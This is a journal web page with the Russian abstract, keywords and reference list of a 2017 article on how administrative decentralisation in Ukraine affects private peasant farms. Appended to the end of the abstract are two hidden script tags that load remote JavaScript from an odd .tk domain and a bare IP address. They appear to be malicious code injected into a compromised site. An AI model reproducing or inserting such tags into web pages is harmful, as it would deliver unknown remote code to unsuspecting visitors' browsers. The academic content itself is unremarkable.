eISSN 2413-2322

pISSN 2221-1055

УДК: 631.115:342.25:334.7
Розвиток сільських територій і соціальна сфера села

Развитие личных крестьянских хозяйств в условиях административной децентрализации / Губени Ю.Э., Коверко Ю.А. // Экономика АПК. - 2017. - № 1 - С. 68

Целью публикации является исследование влияния административно-территориальной децентрализации на развитие предпринимательской среды личных крестьянских хозяйств (ОСГ). Определено содержание децентрализации в сельских территориях. Доказано объективную природу предпринимательской среды таких хозяйств и идентифицированы составляющие, которые изменятся под влиянием децентрализации. Проведен OT-анализ (SWOT-анализ) изменений предпринимательской среды ОСГ. На основе ситуационного анализа одного из районов Львовщины определены изменения и тенденции изменений предпринимательской среды ОСГ. Обоснована необходимость продолжения исследований изменений и экономических ожиданий, вызванных децентрализацией в сельских территориях. Табл.: 1. Библиогр.: 17.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключевые слова: предпринимательская среда, личные крестьянские хозяйства, децентрализация, административное деление, сельские советы, территориальные общины

Список использованных источников

 1. Голубчик М.М. Экономическая и социальная география. Основы науки / М.М. Голубчик, Э.Л. Файбусович и др. М.: ВЛАДОС, 2004 / Режим доступу: http://mirknig.com/ knigi/ estesstv_nauki / 1181629903- ekonomicheskaya-i-socialnaya-geografiya-osnovy-nauki.html.
 2. Ulrich van Suntum: Die Thünen’schen Ringe. In: Wirtschaftswissenschaftliches Studium (WiSt), 9. Jg., Heft 8 (August 1980),
 3. Порошенко П.О. Децентралізація дає місцевому самоврядуванню достатньо повноважень / П.О.Порошенко [Електронний ресурс]. - Режим доступу: http://www.president.gov.ua/news/ decentralizaciya-daye-miscevim-gromadam-dostatno-povnovazhen-37295
 4. Линьов К.О. Централізація, децентралізація та нелінійність у державному управлінні : дис.. канд. наук з держ. управління: 25.00.02 / К.О. Линьов. - К., 2004.
 5. Місцеве самоврядування в умовах децентралізації влади в Україні : колект. моногр. / Ж.А. Белець та ін. ; за ред. Р. Плюща. - К.: Рідна мова, 2016. - 742 с.
 6. Регіональна політика і децентралізація влади в Україні в контексті євроінтеграційних процесів : зб. наук. пр. / [за ред. Шемшученка Ю.С., Кресіної І.О.] ; НАН України, Ін-т держави і права ім. В. М. Корецького, Київ. Ун-т права. - К.: Ін-т держави і права ім. В. М. Корецького, Київ. Ун-т права, 2015. - 258 с.
 7. Юсуфова А.А. Методичні основи аналізу ситуацій і прийняття управлінських рішень / А. А. Юсуфова. - К. : Знання України, 2006. - 20 с.
 8. Кривонос. Ю.Г. Аналіз і синтез ситуацій в системах прийняття рішень / Ю. Г. Кривонос та ін. ; НАН України, Ін-т кібернетики ім. В. М. Глушкова. - К. : Наук. думка, 2009. - 334 с.
 9. Великий тлумачний словник сучасної української мови. - 5-те вид. - К. : Перун, 2005.
 10. Про схвалення Концепції реформування місцевого самоврядування та територіальної організації влади в Україні: Розпорядження КМУ № 333-р від 01.04.2014 // Офіц. вісн.України, 2014, № 30.
 11. Про особисте селянське господарство: Закон України № 742-IV від 15.05.2003 / Офіційний вісник України. - 2003. - № 23.
 12. Булавка Л.В. Особисте селянське господарство як організаційно-правова форма господарювання, його суть та шляхи підвищення ефективності функціонування / Л.В. Булавка. - http://www.pdaa.edu.ua/sites/default/files/nppdaa /2011/3_1/053.pdf.
 13. Остапчук А.Д. Мале підприємництво - основа сталого розвитку сільських територій / А.Д. Остапчук, В.Г. Вдович [Електронний ресурс]. - Режим доступу: http://elibrary.nubip.edu.ua /12831/1/11oad.pdf.
 14. Збарський В.К. Особисті селянські господарства - основа формування малого підприємництва на селі : наук. доп. / В. К. Збарський, А. І. Липов’як-Мєлкозьорова ; за ред. В. К. Збарського. - К. : ННЦ ІАЕ, 2011.
 15. Губені Ю.Е. Підприємництво: навч. посіб. / Ю.Е. Губені. - Л.: Укр. технол, 2012.
 16. Гой І. Підприємництво: навч. посіб. / І. Гой, Т. Смелянська. - К.: ЦУЛ, 2013.
 17. Про внесення змін до Закону України "Про фермерське господарство" щодо стимулювання створення та діяльності сімейних фермерських господарств // Відом. Верхов. Ради України (ВВР), 2016. - № 21.
Читать статью: e_apk_2017_1_11.pdf